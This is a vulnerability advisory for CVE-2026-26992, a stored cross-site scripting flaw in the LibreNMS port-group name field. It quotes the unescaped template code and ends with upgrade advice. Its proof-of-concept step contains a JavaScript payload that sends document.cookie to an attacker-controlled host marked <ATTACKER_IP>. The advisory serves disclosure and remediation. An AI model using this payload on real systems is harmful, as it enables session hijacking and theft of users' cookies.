CVE-2026-26992
LibreNMS /port-groups name Stored Cross-Site Scripting
Description
### Summary **/port-groups name Stored Cross-Site Scripting** - HTTP POST - Request-URI(s): "/port-groups" - Vulnerable parameter(s): "name" - Attacker must be authenticated with "admin" privileges. - When a user adds a port group, an HTTP POST request is sent to the Request-URI "/port-groups". The name of the newly created port group is stored in the value of the name parameter. - After the port group is created, the entry is displayed along with some relevant buttons like Edit and Delete. ### Details The vulnerability exists as the name of the port group is not sanitized of HTML/JavaScript-related characters or strings. When the delete button is rendered, the following template is used to render the page: _resources/views/port-group/index.blade.php:_ ``` @extends('layouts.librenmsv1') @section('title', __('Port Groups')) @section('content') <div class="container-fluid"> <x-panel id="manage-port-groups-panel"> // [...Truncated...] @foreach($port_groups as $port_group) // [...Truncated...] <button type="button" class="btn btn-danger btn- sm" title="{{ __('delete Port Group') }}" aria-label="{{ __('Delete') }}" onclick="delete_pg(this, '{{ $port_group- >name }}', '{{ route('port-groups.destroy', $port_group->id) }}')"> // using the port's name in the Delete button functionality without sanitizing for XSS related characters/strings ``` As the device's name is not sanitized of HTML/JavaScript-related characters or strings, this can result in stored cross-site scripting. ### PoC - Login - Select Ports > Manage Port Groups - Select New Port Group - Input `12345');varpt=newImage();pt.src='http://<ATTACKER_IP>/cookiePG'.concat(document.cookie);document.body.appendChild(pt);delete_pg(this, '12345 into the "Name" input box (change <ATTACKER_IP> to be an the IP of an attacker controlled webserver)` - Select Save - Select the Delete Icon for the newly created Port Group - Select OK - The JavaScript payload is not sanitized and an HTTP request will be sent to the attacker controlled server, leaking the user's cookies.
How to fix CVE-2026-26992
To remediate CVE-2026-26992, upgrade the affected package to a fixed version below.
- —upgrade to 26.2.0 or later
Is CVE-2026-26992 being exploited?
Low — EPSS is 0.0%, meaning exploitation activity has not been observed at scale.